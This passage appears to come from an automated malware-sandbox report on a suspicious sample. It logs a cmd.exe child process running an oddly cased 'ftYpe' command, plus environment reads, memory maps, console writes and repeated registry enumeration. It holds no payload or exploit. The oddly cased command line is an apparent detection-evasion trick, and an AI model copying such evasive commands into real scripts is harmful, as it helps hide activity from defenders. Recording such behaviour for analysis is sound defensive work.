| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x77b317e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-06 08:01:15 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 123771 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
5 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
3 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
4 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
2 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
2 |
Process #5: cmd.exe
1296
0
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /S /D /c" ftYpe " |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:56, Reason: Child Process |
| Unmonitor | End Time: 00:00:57, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb40 |
| Parent PID | 0xb38 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B44
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0042ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000520000 | 0x00520000 | 0x0052ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000530000 | 0x00530000 | 0x006b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006c0000 | 0x006c0000 | 0x00840fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000850000 | 0x00850000 | 0x01c4ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c50000 | 0x01c50000 | 0x01f92fff | Pagefile Backed Memory | r |
|
|
|
- |
| cmd.exe | 0x49e40000 | 0x49e98fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fee69d0000 | 0x7fee69d7fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (1003)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
2 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
249 | |
| Open | STD_OUTPUT_HANDLE | - |
|
501 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 103 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 100 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 124 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 122 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 126 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 119 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 118 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 98 |
|
7 | |
| Write | STD_OUTPUT_HANDLE | size = 147 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 133 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 127 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 134 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 131 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 149 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 92 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 138 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 105 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 109 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 79 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 83 |
|
9 | |
| Write | STD_OUTPUT_HANDLE | size = 80 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 104 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 87 |
|
8 | |
| Write | STD_OUTPUT_HANDLE | size = 89 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 85 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 86 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 71 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 72 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 17 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 125 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 45 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 51 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 70 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 76 |
|
8 | |
| Write | STD_OUTPUT_HANDLE | size = 35 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 82 |
|
9 | |
| Write | STD_OUTPUT_HANDLE | size = 58 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 68 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 75 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 61 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 63 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 67 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 50 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 52 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 53 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 78 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 90 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 99 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 81 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 93 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 91 |
|
7 | |
| Write | STD_OUTPUT_HANDLE | size = 84 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 34 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 64 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 47 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 74 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 123 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 66 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 46 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 65 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 49 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 48 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 55 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 77 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 113 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 95 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 129 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 94 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 69 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 136 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 88 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 60 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 97 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 96 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 57 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 177 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 160 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 102 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 101 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 110 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 144 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 142 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 141 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 117 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 108 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 26 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 54 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 |
Registry (269)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\*\Shell\Open\Command | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes | - |
|
1 | |
